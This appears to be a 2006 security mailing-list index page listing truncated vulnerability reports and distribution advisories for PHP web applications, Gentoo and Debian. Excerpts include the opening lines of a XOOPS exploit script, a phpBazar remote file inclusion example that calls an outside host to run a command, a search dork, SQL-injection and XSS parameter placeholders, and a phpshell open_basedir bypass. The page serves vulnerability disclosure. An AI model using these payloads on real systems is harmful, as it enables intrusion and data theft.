- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-15
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 200605-14
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - -

[ more ]  [ reply ]

_______________________________________________________________________

XAMPP - Multiple Priviledge Escalation and Rogue Autostart
_______________________________________________________________________

Ref : TZO-072006-Xampp
Author : Thierry Zoller
WWW : http://secdev.zoller.lu

[ more ]  [ reply ]

#!/usr/bin/php -q -d short_open_tag=on

<?

echo "XOOPS <= 2.0.13.2 'xoopsOption[nocommon]' exploit\r\n";

echo "by rgod rgod (at) autistici (dot) org [email concealed]\r\n";

echo "site: http://retrogod.altervista.org\r\n\r\n";

/*

works with:

magic_quotes_gpc = Off

register_globals = On

*/

if ($argc<4) {

echo "

[ more ]  [ reply ]

if the exception raises in some extension in the user profile and the page can catch path to the user profile and so a remote attacker will know the user login

PoC: https://bugzilla.mozilla.org/attachment.cgi?id=164547

[ more ]  [ reply ]

Vendor: Power-Place

www.power-place.net

(PHP Easy Galerie 1.1)

-------------------------------------------------

Author:Craziest

Contact: craziest(at)gmail(dot)com

Vuln discovered by BrEakerS

--------------------------------------------------

Method:An attacker can exploit thi

[ more ]  [ reply ]

Captivate 1.0

Homepage:

http://new-place.org/scripts/

Description:

A basic but highly-customizable PHP gallery script with optional thumbnail creation. Designed with screencaps in mind, it works best for large galleries of same-sized images.

Effected files:

gallery.php

Inproper filt

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1070-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze, Dann Frazier
May 21th, 2006

[ more ]  [ reply ]

Destiney Links Script v2.1.2 - XSS Vulnv & Full path errors.

Homepage:

http://destiney.com/scripts

Description:

Destiney Links is an Open Source project written in PHP for use with the MySQL Server entity. Links provides a pre-built, dynamically generated, Link site. Links counts referre

[ more ]  [ reply ]

Destiney Rated Images Script v0.5.0

Homepage:

http://destiney.com/scripts

Description:

Destiney Rated Images script is continuation of the free phpRated script. Rated Images is a web application written in

PHP for use with MySQL. Rated Images allows visitors to your site to list thei

[ more ]  [ reply ]

/*

---------------------------------------------------------------

[N]eo [S]ecurity [T]eam [NST]® Advisory #22

---------------------------------------------------------------

Program : PunBB 1.2.11

Homepage: http://www.punbb.org

Vulnerable Versions: PunBB 1.2.11 & lower ones

Risk: Low!

Impac

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1069-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze, Dann Frazier
May 20th, 2006

[ more ]  [ reply ]

Hiox Guestbook 3.1

Homepage:

http://hscripts.com/scripts/php/gb.php

Description

A free guest book script that can be added in to any html website with php.

Effected files:

index.php

Exploit:

The input forms for signing the guestbook arent sanatized properally. This could lead use

[ more ]  [ reply ]

You said :

"By PHP Emperor"

but this was a small advisory/exploit from KAPDA by me :

http://www.milw0rm.com/exploits/1807

http://www.securityfocus.com/bid/18043

and also orginal advisory :

http://www.kapda.ir/advisory-327.html

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1068-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
May 20th, 2006

[ more ]  [ reply ]

Hey

when you try to run a phpshell and open BaseDir is on you will se that:

Open base dir: /home/***/:/usr/lib/php:/usr/local/lib/php:/tmp

Okey.. now run the phpshell with user

like that:

http://server.***.com/~***/phpshell.php

you will see that:

Open base dir: OFF (not secure)

-------------

[ more ]  [ reply ]

Zix Forum <= 1.12 (layid) SQL Injection Vulnerability

Vulnerability:

--------------------

SQL_Injection:

Input passed to the "layid" parameter in 'settings.asp' not properly sanitised before being used in a SQL query.

This can be exploited to manipulate SQL queries by injecting arbitrary SQ

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1064-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
May 19th, 2006

[ more ]  [ reply ]

Hello,

This issue has been fixed in FCKeditor 2.3 Beta.

Bets regards,

FredCK

------

http://www.fckeditor.net

"Support Open Source Software... What about a donation today?"

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1067-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Martin Schulze, Dann Frazier
May 20th, 2006

[ more ]  [ reply ]

Xtremescripts Topsites v1.1

Homepage:

http://www.xtremescripts.com/topsites.php

Description:

Xtreme Topsites is a popular topsite PHP script for websites. Most commonly

used across anime websites at the moment. The topsite will count hits/clicks

in and hits out and will rank them o

[ more ]  [ reply ]

============================

Discovery By: Mr-X

Site: www.alshmokh.com

E-mail: Mster-X (at) hotmail (dot) com [email concealed]

===========================

Example:

/nennung.php?pid=[SQL]

/nennung.php?pid=[XSS]

[ more ]  [ reply ]

-----------------------------------------------------------------

Vendor: ActualScripts

URL: http://actualscripts.com

-----------------------------------------------------------------

Credits:

Discovered by: 'Aesthetico'

http://www.majorsecurity.de

------------------------------------------

[ more ]  [ reply ]

==========================

Discovery By: Mr-X

Site: www.alshmokh.com

E-mail: Mster-X (at) hotmail (dot) com [email concealed]

==========================

Example:

/news_information.php?id=12&flag=[XSS]

[ more ]  [ reply ]

Hi,

This issue has been fixed in FCKeditor 2.3 Beta.

Best regards,

FredCK

------

http://www.fckeditor.net

"Support Open Source Software... What about a donation today?"

[ more ]  [ reply ]

Title: phpBazar <= 2.1.0 Multiple vulnerabilites

URL: http://www.smartisoft.com/

Dork: inurl:classified.php phpbazar

Exploits:

-remote file inclusion: /classified_right.php?language_dir=http://yourhost/cmd.gif?cmd=ls

-access to admin login and password: /admin/admin.php?action=edit_member&val

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1066-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
May 20th, 2006

[ more ]  [ reply ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
--
Debian Security Advisory DSA 1065-1 security (at) debian (dot) org [email concealed]
http://www.debian.org/security/ Moritz Muehlenhoff
May 19th, 2006

[ more ]  [ reply ]